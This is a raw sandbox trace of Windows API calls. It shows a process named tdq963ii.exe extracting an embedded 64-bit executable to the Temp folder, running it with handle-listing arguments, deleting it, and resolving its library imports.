(in: lpSrc="%TEMP%", lpDst=0x18fb20, nSize=0x104 | out: lpDst="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x25 [0232.467] FindResourceW (hModule=0x0, lpName="RCHANDLE64", lpType="BINRES") returned 0x476060 [0232.467] LoadResource (hModule=0x0, hResInfo=0x476060) returned 0x43c648 [0232.467] SizeofResource (hModule=0x0, hResInfo=0x476060) returned 0x37490 [0232.467] LockResource (hResData=0x43c648) returned 0x43c648 [0232.467] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x18) returned 0x509710 [0232.468] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\tdq963ii64.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\tdq963ii64.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x18f95c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x90 [0232.469] GetFileType (hFile=0x90) returned 0x1 [0232.469] WriteFile (in: hFile=0x90, lpBuffer=0x43c648*, nNumberOfBytesToWrite=0x37000, lpNumberOfBytesWritten=0x18df04, lpOverlapped=0x0 | out: lpBuffer=0x43c648*, lpNumberOfBytesWritten=0x18df04*=0x37000, lpOverlapped=0x0) returned 1 [0232.476] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x1000) returned 0x509730 [0232.476] WriteFile (in: hFile=0x90, lpBuffer=0x509730*, nNumberOfBytesToWrite=0x490, lpNumberOfBytesWritten=0x18df00, lpOverlapped=0x0 | out: lpBuffer=0x509730*, lpNumberOfBytesWritten=0x18df00*=0x490, lpOverlapped=0x0) returned 1 [0232.476] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x509730 | out: hHeap=0x4f0000) returned 1 [0232.477] CloseHandle (hObject=0x90) returned 1 [0232.477] GetCommandLineW () returned="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner" [0232.477] CreateProcessW (in: lpApplicationName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\tdq963ii64.exe", lpCommandLine="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18facc*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18fb10 | out: lpCommandLine="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner", lpProcessInformation=0x18fb10*(hProcess=0x94, hThread=0x90, dwProcessId=0x490, dwThreadId=0x5e4)) returned 1 [0232.618] WaitForSingleObject (hHandle=0x94, dwMilliseconds=0xffffffff) returned 0x0 [0236.754] DeleteFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\tdq963ii64.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\tdq963ii64.exe")) returned 0 [0236.755] CloseHandle (hObject=0x94) returned 1 [0236.755] CloseHandle (hObject=0x90) returned 1 [0236.757] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x508810 | out: hHeap=0x4f0000) returned 1 [0236.757] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18fedc | out: phModule=0x18fedc) returned 0 [0236.757] ExitProcess (uExitCode=0x0) [0236.757] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5070b0 | out: hHeap=0x4f0000) returned 1 Process: id = "242" image_name = "tdq963ii.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe" page_root = "0x28686000" os_pid = "0xb68" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "145" os_parent_pid = "0x6f4" cmd_line = "tdq963ii.exe -accepteula -c -y -p handles -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 840 os_tid = 0x544 [0232.076] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76d30000 [0232.077] GetProcAddress (hModule=0x76d30000, lpProcName="SetEvent") returned 0x76d416c5 [0232.077] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0232.077] GetProcAddress (hModule=0x76d30000, lpProcName="DeviceIoControl") returned 0x76d4322f [0232.077] GetProcAddress (hModule=0x76d30000, lpProcName="DuplicateHandle") returned 0x76d41886 [0232.077] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageW") returned 0x76d44620 [0232.077] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventW") returned 0x76d4183e [0232.077] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0232.077] GetProcAddress (hModule=0x76d30000, lpProcName="ExpandEnvironmentStringsW") returned 0x76d44173 [0232.078] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeW") returned 0x76d4418b [0232.078] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDirectoryW") returned 0x76d45063 [0232.078] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0232.078] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadErrorMode") returned 0x76dbaf42 [0232.078] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0232.078] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0232.078] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0232.078] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateThread") returned 0x76d47a2f [0232.078] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0232.079] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0232.079] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0232.079] GetProcAddress (hModule=0x76d30000, lpProcName="FindResourceW") returned 0x76d45971 [0232.499] GetProcAddress (hModule=0x76d30000, lpProcName="SizeofResource") returned 0x76d45ac9 [0232.499] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0232.499] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0232.499] GetProcAddress (hModule=0x76d30000, lpProcName="LoadResource") returned 0x76d4594c [0232.499] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0232.499] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0232.499] GetProcAddress (hModule=0x76d30000, lpProcName="LockResource") returned 0x76d45959 [0232.499] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0232.500] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0232.500] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0232.500] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0232.500] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0232.500] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0232.500] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0232.501] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0232.501] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleScreenBufferInfo") returned 0x76d6bafd [0232.501] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0232.501] GetProcAddress (hModule=0x76d30000, lpProcName="OutputDebugStringW") returned 0x76d6d1d4 [0232.501] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleW") returned 0x76de739a [0232.501] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0232.501] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0232.501] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0232.501] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0232.501] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0232.501] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0232.501] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0232.502] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0232.502] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0232.502] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0232.502] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0232.502] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0232.502] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0232.502] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0232.502] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleInputA") returned 0x76de6f53 [0232.502] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleMode") returned 0x76d5a77d [0232.502] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0232.503] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0232.503] GetProcAddress (hModule=0x76d30000, lpProcName="ExitThread") returned 0x77c9d598 [0232.503] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0232.503] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0232.503] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0232.503] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0232.503] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0232.503] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0232.503] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0232.504] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0232.504] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0232.504] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0232.504] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0232.504] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0232.504] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0232.504] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0232.504] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0232.504] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0232.505] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0232.505] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0232.505] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0232.505] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0232.505] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0232.505] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0232.505] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0232.505] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0232.505] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0232.505] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0232.506] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0232.506] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0232.506] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0232.506] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0232.506] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0232.506] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0232.506] GetProcAddress (hModule=0x77710000, lpProcName="GetTokenInformation") returned 0x7772431c [0232.506] GetProcAddress (hModule=0x77710000, lpProcName="RegDeleteKeyW") returned 0x77721272 [0232.506] GetProcAddress (hModule=0x77710000, lpProcName="LookupPrivilegeValueW") returned 0x777241b3 [0232.507] GetProcAddress (hModule=0x77710000, lpProcName="AdjustTokenPrivileges") returned 0x7772418e [0232.507] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessToken") returned 0x77724304 [0232.507] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0232.507] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0232.507] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0232.507] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyW") returned 0x77722459 [0232.508] GetProcAddress (hModule=0x77710000, lpProcName="RegCreateKeyW") returned 0x77721514 [0232.508] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0232.508] GetProcAddress (hModule=0x77710000, lpProcName="LookupAccountSidW") returned 0x77724874 [0232.508] LoadLibraryA (lpLibFileName="COMDLG32.dll") returned 0x77270000 [0232.508] GetProcAddress (hModule=0x77270000, lpProcName="PrintDlgW") returned 0x772733a3 [0232.508] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x770a0000 [0232.508] GetProcAddress (hModule=0x770a0000, lpProcName="StartPage") returned 0x770e401a [0232.509] GetProcAddress (hModule=0x770a0000, lpProcName="EndDoc") returned 0x770e3f29 [0232.509] GetProcAddress (hModule=0x770a0000, lpProcName="StartDocW") returned 0x770e4c51 [0232.509] GetProcAddress (hModule=0x770a0000, lpProcName="SetMapMode") returned 0x770bb02f [0232.509] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0232.509] GetProcAddress (hModule=0x770a0000, lpProcName="EndPage") returned 0x770c6bde [0232.509] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0232.509] GetProcAddress (hModule=0x77130000, lpProcName="SendMessageW") returned 0x77149679 [0232.509] GetProcAddress (hModule=0x77130000, lpProcName="DialogBoxIndirectParamW") returned 0x7716cbf3 [0232.509] GetProcAddress (hModule=0x77130000, lpProcName="EndDialog") returned 0x7716b99c [0232.510] GetProcAddress (hModule=0x77130000, lpProcName="LoadCursorW") returned 0x771488f7 [0232.510] GetProcAddress (hModule=0x77130000, lpProcName="InflateRect") returned 0x77153309 [0232.510] GetProcAddress (hModule=0x77130000, lpProcName="GetSysColorBrush") returned 0x771535a4 [0232.510] GetProcAddress (hModule=0x77130000, lpProcName="SetCursor") returned 0x771541f6 [0232.510] GetProcAddress (hModule=0x77130000, lpProcName="SetWindowTextW") returned 0x771520ec [0232.510] GetProcAddress (hModule=0x77130000, lpProcName="GetDlgItem") returned 0x7716f1ba [0232.510] LoadLibraryA (lpLibFileName="VERSION.dll") returned 0x75440000 [0232.510] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoW") returned 0x754419f4 [0232.511] GetProcAddress (hModule=0x75440000, lpProcName="VerQueryValueW") returned 0x75441b51 [0232.511] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoSizeW") returned 0x754419d9 [0232.511] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x2) returned 1 [0232.512] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x4) returned 1 [0232.512] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0x4179d6a0, dwHighDateTime=0x1d68287)) [0232.512] GetCurrentThreadId () returned 0x544 [0232.512] GetCurrentProcessId () returned 0xb68 [0232.512] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff70 | out: lpPerformanceCount=0x18ff70*=35285129753) returned 1 [0232.512] GetProcessHeap () returned 0x8e0000 [0232.513] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0232.513] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0232.513] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0232.513] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0232.513] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0232.513] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0232.514] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventExW") returned 0x76dc410b [0232.514] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreExW") returned 0x76dc4195 [0232.514] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadStackGuarantee") returned 0x76d4d31f [0232.514] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolTimer") returned 0x76d5ee7e [0232.514] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolTimer") returned 0x77c8441c [0232.514] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77cac50e [0232.514] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolTimer") returned 0x77cac381 [0232.514] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWait") returned 0x76d5f088 [0232.515] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolWait") returned 0x77c905d7 [0232.515] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWait") returned 0x77caca24 [0232.515] GetProcAddress (hModule=0x76d30000, lpProcName="FlushProcessWriteBuffers") returned 0x77c60b8c [0232.515] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77d1fde8 [0232.515] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessorNumber") returned 0x77cb1e1d [0232.515] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalProcessorInformation") returned 0x76dc4761 [0232.515] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkW") returned 0x76dbcd11 [0232.516] GetProcAddress (hModule=0x76d30000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0232.516] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesEx") returned 0x76dc424f [0232.516] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringEx") returned 0x76dc46b1 [0232.516] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatEx") returned 0x76dd6676 [0232.516] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0232.516] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatEx") returned 0x76dd65f1 [0232.516] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0232.516] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocaleName") returned 0x76dc47e1 [0232.516] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0232.517] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentPackageId") returned 0x0 [0232.517] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount64") returned 0x76d5eee0 [0232.517] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0232.517] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0232.518] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x3bc) returned 0x8f60d0 [0232.518] GetCurrentThreadId () returned 0x544 [0232.518] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x0, Size=0x18) returned 0x8f6498 [0232.518] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x800) returned 0x8f64b8 [0232.518] GetStartupInfoW (in: lpStartupInfo=0x18fed8 | out: lpStartupInfo=0x18fed8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="tdq963ii.exe -accepteula -c -y -p handles -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x40ad42, hStdOutput=0x778700a6, hStdError=0x0)) [0232.518] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0232.518] GetFileType (hFile=0x3) returned 0x2 [0232.520] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0232.520] GetFileType (hFile=0x7) returned 0x2 [0232.520] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0232.520] GetFileType (hFile=0xb) returned 0x2 [0232.520] GetCommandLineW () returned="tdq963ii.exe -accepteula -c -y -p handles -nobanner" [0232.521] GetEnvironmentStringsW () returned 0x8f6cc0* [0232.521] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x0, Size=0xb88) returned 0x8f7850 [0232.521] FreeEnvironmentStringsW (penv=0x8f6cc0) returned 1 [0232.521] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x426ea0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0232.521] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x0, Size=0x88) returned 0x8f6cc0 [0232.521] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xa0) returned 0x8f6d50 [0232.521] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x3e) returned 0x8f83f8 [0232.521] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x6c) returned 0x8f6df8 [0232.521] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x6e) returned 0x8f6e70 [0232.521] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x78) returned 0x8ef8f0 [0232.521] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x62) returned 0x8f6ee8 [0232.521] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x2e) returned 0x8f6f58 [0232.521] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x48) returned 0x8f6f90 [0232.521] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x2c) returned 0x8f6fe0 [0232.521] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x28) returned 0x8f7018 [0232.521] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x1a) returned 0x8f5aa0 [0232.521] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x4a) returned 0x8f7048 [0232.521] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x72) returned 0x8ef970 [0232.522] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x30) returned 0x8f70a0 [0232.522] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x2e) returned 0x8f70d8 [0232.522] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x1c) returned 0x8f5ac8 [0232.522] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd2) returned 0x8f7110 [0232.522] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x7c) returned 0x8f71f0 [0232.522] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x36) returned 0x8f7278 [0232.522] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x3a) returned 0x8f8440 [0232.522] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x90) returned 0x8f72b8 [0232.522] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x24) returned 0x8f7350 [0232.522] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x30) returned 0x8f7380 [0232.522] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x36) returned 0x8f73b8 [0232.522] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x48) returned 0x8f73f8 [0232.522] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x52) returned 0x8f7448 [0232.522] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x3c) returned 0x8f8488 [0232.522] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x18) returned 0x8f74a8 [0232.522] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x82) returned 0x8f74c8 [0232.522] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x2e) returned 0x8f7558 [0232.522] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x1e) returned 0x8f5af0 [0232.522] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x2c) returned 0x8f7590 [0232.522] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x54) returned 0x8f75c8 [0232.522] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x52) returned 0x8f7628 [0232.522] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x2a) returned 0x8f7688 [0232.522] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x3c) returned 0x8f84d0 [0232.522] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x54) returned 0x8f76c0 [0232.522] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x24) returned 0x8f7720 [0232.522] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x30) returned 0x8f7750 [0232.522] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x8c) returned 0x8f7788 [0232.522] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8f7850 | out: hHeap=0x8e0000) returned 1 [0232.523] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x800) returned 0x8f7820 [0232.523] GetLastError () returned 0x0 [0232.523] SetLastError (dwErrCode=0x0) [0232.523] GetLastError () returned 0x0 [0232.523] SetLastError (dwErrCode=0x0) [0232.523] GetLastError () returned 0x0 [0232.523] SetLastError (dwErrCode=0x0) [0232.523] GetACP () returned 0x4e4 [0232.523] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x0, Size=0x220) returned 0x8f8028 [0232.523] GetLastError () returned 0x0 [0232.523] SetLastError (dwErrCode=0x0) [0232.523] IsValidCodePage (CodePage=0x4e4) returned 1 [0232.523] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fecc | out: lpCPInfo=0x18fecc) returned 1 [0232.523] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f994 | out: lpCPInfo=0x18f994) returned 1 [0232.523] GetLastError () returned 0x0 [0232.523] SetLastError (dwErrCode=0x0) [0232.523] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 